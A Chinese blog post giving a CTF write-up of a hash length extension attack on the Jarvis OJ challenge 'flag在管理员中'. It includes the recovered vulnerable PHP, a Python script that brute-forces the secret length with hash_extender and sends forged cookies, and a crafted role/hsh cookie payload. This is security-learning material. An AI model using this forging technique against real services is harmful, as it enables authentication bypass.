hash长度扩展攻击

最新推荐文章于 2024-09-18 10:47:12 发布
最新推荐文章于 2024-09-18 10:47:12 发布
阅读量705 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43677324/article/details/89219455
版权

hash长度扩展攻击探索

这几天在jarvis-oj平台看见了一个有关于hash长度扩展攻击的题,第一次见,来研究下。题目名:flag在管理员中
一、
首先打开网页,习惯性的查看源代码,啥都没有,猜测可能有源代码泄露
所以我们用脚本来扫一下
e6924e2b2ae282240b5839b32b2df168.png
我们打开第一个
有:
下载得到文件
index.php~

这个其实是php的备份恢复文件,拿到lunix下,重命名为index.php.swp ,使用命令vim -r index.php 即可恢复原来的php文件
得到源码:

<!DOCTYPE html>
<html>
<head>
<title>Web 350</title>
<style type="text/css">
	body {
		background:gray;
		text-align:center;
	}
</style>
</head>

<body>
	<?php 
		$auth = false;
		$role = "guest";
		$salt = 
		if (isset($_COOKIE["role"])) {
			$role = unserialize($_COOKIE["role"]);
			$hsh = $_COOKIE["hsh"];
			if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) {
				$auth = true;
			} else {
				$auth = false;
			}
		} else {
			$s = serialize($role);
			setcookie('role',$s);
			$hsh = md5($salt.strrev($s));
			setcookie('hsh',$hsh);
		}
		if ($auth) {
			echo "<h3>Welcome Admin. Your flag is 
		} else {
			echo "<h3>Only Admin can see the flag!!</h3>";
		}
	?>
	
</body>
</html>

我们通过
hash_extender+python来解密
借用大佬脚本


# -*- coding:utf-8 -*-from urlparse import urlparse
from httplib import HTTPConnection
from urllib import urlencode
import json
import time
import os
import urllib
def gao(x, y):
        #print x
        #print y
    url = "http://web.jarvisoj.com:32778/index.php"
    cookie = "role=" + x + "; hsh=" + y
        #print cookie
    build_header = {
            'Cookie': cookie,
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) Gecko/20100101 Firefox/44.0',
            'Host': 'web.jarvisoj.com:32778',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    }
    urlparts = urlparse(url)
    conn = HTTPConnection(urlparts.hostname, urlparts.port or 80)
    conn.request("GET", urlparts.path, '', build_header)
    resp = conn.getresponse()
    body = resp.read()
    return body
for i in xrange(1000):
    print i
    # secret len = ???
    find_hash = "./hash_extender -d ';\"tseug\":5:s' -s 3a4727d57463f122833d9e732f94e4e0 -f md5  -a ';\"nimda\":5:s' --out-data-format=html -l " + str(i) + " --quiet"
    #print find_hash
    calc_res = os.popen(find_hash).readlines()
    hash_value = calc_res[0][:32]
    attack_padding = calc_res[0][32:]
    attack_padding = urllib.quote(urllib.unquote(attack_padding)[::-1])
    ret = gao(attack_padding, hash_value)
    if "Welcome" in ret:
        print ret
        break

要在hash_extender下使用此脚本
注意:e4b51539fd0f05c33860c7208db9e5db.png
在做其他题的时候将此处网址改变
运行后得到
9de122d78994f94a06e32f497f37156a.png
其实这个原理我不太同,通过网上其他大佬的解释,我们使用另一种方法
二、
我们先使用bp抓包
5d786b1bb91f830cdd6403a10c0935b0.png
我们的到两个cookies
role 和 hsh 这两个非常重要
我们接下来要做的就是通过bp修改cookie的值来通过验证
我们先来审计一下源码
注意这里:

a31c769a510e1343b4c139027a2e3c83.png
我们想使auth为true
条件是变量为admin
这个好办
如图:
19b2aa1ebf7269f3cd7083b3069cd0cc.png
之后就是后面的那个条件
hash扩展长度攻击是可以通过1.已知的hash值
2.密文的长度,或内容
3.原来的识别数据
我们可以通过使用
hashpump
进行生成新的role与hsh
注意:
1.我们可以通过代码推出原来的cookie【role】
2.注意有序列化,和字符串反向
如图:
63d69f072eec679df2c64dff1087b268.png
别忘了我们将\x换为%

变为

s%3a5%3a"admin"%3b%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80s%3a5%3a"guest"%3b; hsh=fcdc3840332555511c4e4323f6decb07

具体怎么变得有待探讨
emm
修改后就得到了flag

thesummerN
关注
长度扩展攻击
osier12345的博客
04-06 1572
长度扩展攻击(length extension attack),是指针对某些允许包含额外信息的加密散列函数的攻击手段。对于满足以下条件的散列函数,都可以作为攻击对象: ① 加密前将待加密的明文按一定规则填充到固定长度(例如512或1024比特)的倍数; ② 按照该固定长度,将明文分块加密,并用前一个块的加密结果,作为下一块加密的初始向量(Initial Vector)。 满足上述要求的散列函数称为...
hash哈希长度扩展攻击解析(记录一下,保证不忘)
热门推荐
syh_486_007的专栏
04-23 2万+
起因 这是 ISCC 上的一道题目,抄 PCTF 的,并且给予了简化。在利用简化过的方式通过后,突然想起利用哈希长度扩展攻击来进行通关。哈希长度扩展攻击是一个很有意思的东西,利用了 md5、sha1 等加密算法的缺陷,可以在不知道原始密钥的情况下来进行计算出一个对应的 hash 值。  这里是 ISCC 中题目中的 admin.php 的算法: $auth = false; if (is
哈希长度拓展攻击
weixin_44843084的博客
06-09 753
哈希长度拓展攻击 哈希长度拓展攻击(Hash Length Extension Attacks)的实现就是基于初始链变量的值被新的覆盖。 易受长度扩展攻击: 准备了一个密文和一些数据构造成一个字符串里,并且使用了MD5之类的哈希函数生成了一个哈希值(也就是所谓的signature/签名) 让攻击者可以提交数据以及哈希值,虽然攻击者不知道密文 服务器把提交的数据跟密文构造成字符串,并经过哈希后判断是否等同于提交上来的哈希攻击者可以构造出{secret || data || attacker_contr
Hash扩展长度攻击过程详解
最新发布
ryanzzzzz的博客
09-18 742
其中'7365637265744b657970737764417573657241'对应的就是'secretKeypswdAuserA',注意其中'secretKey'是服务器和用户之间的共享密钥,由服务器程序自动附加到用户的输入信息开头。'9800000000000000'共8个字节,对应的是填充前内容的bit长度,例如这里长度是152bits,对应的小端16进制8字节就是'9800000000000000'。攻击方的目标是在不知道userB的口令和hash签名的情况下,成功身份鉴别。
长度拓展攻击 (理解)
weixin_43749051的博客
02-09 1082
长度扩展攻击是当一个攻击者通过添加一个后缀来修 改一个消息,但仍然能够指出消息的Hash值,这里有两种类型 的长度扩展攻击。符号||表示链接。 类型一:如果Digest(Msg1)=Digest(Msg2),并且Len(Msg1)= Len(Msg2),消 息 Msg1 ¹ Msg2,则 Digest(Msg1 ‖ Sufx)= Digest(Msg2‖Sufx)。 类型二:假设一个原始消息...
密码学系列之:Merkle–Damgård结构和长度延展攻击
程序那些事
07-23 4284
Merkle–Damgård结构简称为MD结构,主要用在hash算法中抵御碰撞攻击。这个结构是一些优秀的hash算法,比如MD5,SHA-1和SHA-2的基础。今天给大家讲解一下这个MD结构和对他进行的长度延展攻击
HASH长度扩展攻击
Noobi的博客
09-29 1493
HASH长度扩展攻击 场景: 当用户向服务端取文件时,服务端会进行验证,给出salt值(用于验证,客户端无从得知,并且需要salt值才能够拿到文件),并进行hsh=sha1(salt+filename)的运算。现通过工具拿到hash即hsh值,并得知filename。 求salt值。 原理: 当服务器进行sha1运算前,会判断字符串(slat+filename)的长度,并将整段字符串分割成64bytes一组。之后进行hash生成。 首先,当hash函数拿到需要被hash的字符串后,先将其字节长度整除64,取
记录一下Hash长度扩展攻击的几个题目
0verWatch的博客
03-09 3262
最近做了几个题目,又学到新的知识点,是有关Hash长度扩展攻击 参考了一波P牛的博客还有我们学校的博客: http://www.cnblogs.com/pcat/p/5478509.html http://www.bxsteam.xyz/2017/05/23/hash%e9%95%bf%e5%ba%a6%e6%89%a9%e5%b1%95%e6%94%bb%e5%87%bb/ 正文 ...
实验吧Web-中-让我进去(Hash长度扩展攻击、加盐密码及Linux下hashpump的安装使用)
Sea_Sand息禅
12-18 1689
打开网页,测试开始,注入费老大劲,看了大佬的blog才知道怎么干。 bp抓包,观察发现cookie中有个source=0,在repeater中修改为source=1,然go一下,出来了一段源代码。 $flag = "XXXXXXXXXXXXXXXXXXXXXXX"; $secret = "XXXXXXXXXXXXXXX"; // This secret is 15 characters lo...
Web hash长度扩展攻击
神隐哥的博客
03-02 539
md5算法 1: 将消息分组。长度为512位(512/8=64字节) 2: 加密字符串的长度%512=448,不够则对分组进行字符填充 当需要进行消息摘要的明文%512!=448,那么就需要补位,补一个80,然后无限补0.直到字符串%512=448 PS:补位是必须进行的操作。长度刚好位448.也得补位。补64字节 3: 存储原消息长度 总结下格式:明文+80+00补全=56字节+8字节的消息长度 第一个方框中。是我们的明文test(16进制),占了4字节 中间的是补位:在后面加上一个80.然后00
用MD5实现hash长度扩展攻击 By Assassin
Assassin
04-28 1万+
今天心血来潮,看到了扩展攻击,猛然想到了之前看的扩展攻击的原理还没有弄懂,这里补充一下,hash长度扩展攻击到底是怎么实现的。题目首先从实验吧上面见到的经典的题目,下面给出源码<?php $flag = "flag{flag is here}"; $secret = "aaaaabbbbbccccc"; // This secret is 15 characters long for securit
hash_extender
04-13
Ron Bowes的哈希扩展器 这将是上的博客文章。 现在,这是一个自述文件。 介绍 您可以在上获取hash_extender工具! ,我的朋友和我在进行了旗大赛。 竞赛的级别之一要求我们执行哈希长度扩展攻击。 我当时甚至从未听说过这种攻击,经过一番阅读后,我意识到执行这种攻击不仅超级酷(从概念上说很简单!),而且完全缺少执行这种攻击的好工具! 在添加了错误数量的空字节或错误地添加了长度值后,我发誓要写一个工具,使自己和其他尝试这样做的人都容易做到这一点。 因此,经过几个星期的工作,就在这里! 现在,我要发布该工具,希望我不会完全怀念能做同样事情的好工具! 它称为hash_extender ,并对我能想到的每种算法实施长度扩展攻击: MD4 MD5 RIPEMD-160 SHA-0 SHA-1 SHA-256 SHA-512 惠而浦 我很高兴将其扩展到其他哈希算法,只
哈希长度拓展攻击 (hash length extension attacks) 示例与原理
Tz_AndHac的博客
03-23 2752
哈希长度拓展攻击 hash length extension attacks示例与原理 哈希长度拓展攻击: 指针对某些允许包含额外信息的加密散列函数的攻击手段。次攻击适用于MD5和SHA-1等基于Merkle–Damgård构造的算法 介绍目录: 哈希与加密的区别 常用哈希算法的介绍 Md5加密过程 Md5拓展攻击示例及原理 哈希与加...
哈希拓展长度攻击
m0_63321019的博客
05-08 917
分块哈希计算进行加密时,通常是将明文信息以类似块密码的形式进行分组,对各个组块依次加密,每一块一般为512bit,也就是64bytes,每组的明文部分为56bytes,剩下的8bytes表示这块明文消息未填充前的长度填充在明文消息的最后一块一般是不满足56ytes时就对这个最后一块进行padding填充,填充至56bytes的位置,,填充方式为,在16进制下,我们需要在消息后添加一个80,然后加0,直至56bytes时变量计算。
极客时间-实用密码学-5如何有效避免长度延展攻击
Tom的博客
12-02 3043
什么是长度延展攻击 假设我们有两段数据S和M以及单向散列函数h,其中S是机密信息。我们通过hash=h(S+M)(其中+,表示字符串连接)计算hash值,通过计数数据的hash与原始hash对比来校验数据是否可靠。因为通常攻击者不知道S值。 比如如下字符串(可以看作url的一部分): key_id=44fefa051fc1c61f5e76f27e620f51d5&perms=read&hash_sig=38d39516d896f879d403bd327a932d9e hash_si=h(
哈希长度扩展攻击解析
chengfangang的专栏
05-26 2273
原文链接 https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks You can grab the hash_extender tool on Github!(Administrative note: I’m no longer at Tenable! I
哈希扩展长度攻击_哈希长度扩展攻击
最佳 Java 编程
06-04 472
哈希扩展长度攻击 在这篇文章中,我将尽力避免夏季的低迷,而将重点放在比抱怨天气更有趣的事情上-哈希长度扩展攻击。 散列长度扩展攻击并不复杂也不复杂,说实话,这只是关于如何使用散列函数。 正如我以前的一篇文章中所讨论的那样,哈希函数有多种类型,但是这篇文章着重于加密哈希函数。 我们将不分析大多数当前加密哈希函数所基于的Merkle–Damgard构造的结构。 需要了解的事实如下: 哈希函...
Hash length extension attacks 分析
4ct10n
07-04 3115
0x00 MD5加密原理 0x1 字节填充 0x2 分组加密 0x3 实例演示 0x01 攻击原理 0x02 攻击脚本 0x1 md5 python 实现 0x2 计算脚本 0x03 实例演示 0x1 简单实例 0x2 jarvisoj flag在管理员手里 方法一 利用hash_extender 方法二 利用上述脚本 0x3 admin step 1 初步审计 step 2 直接解密解法一 ste
扩展知识 Hash算法是什么?原理?
03-30
Hash算法是一种将任意长度的消息压缩成一个固定长度的输出的算法。Hash算法的原理是将输入的消息经过一系列的处理和计算,生成一个固定长度的输出值,该输出值通常称为Hash值或摘要。Hash算法的输出值具有以下特点:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值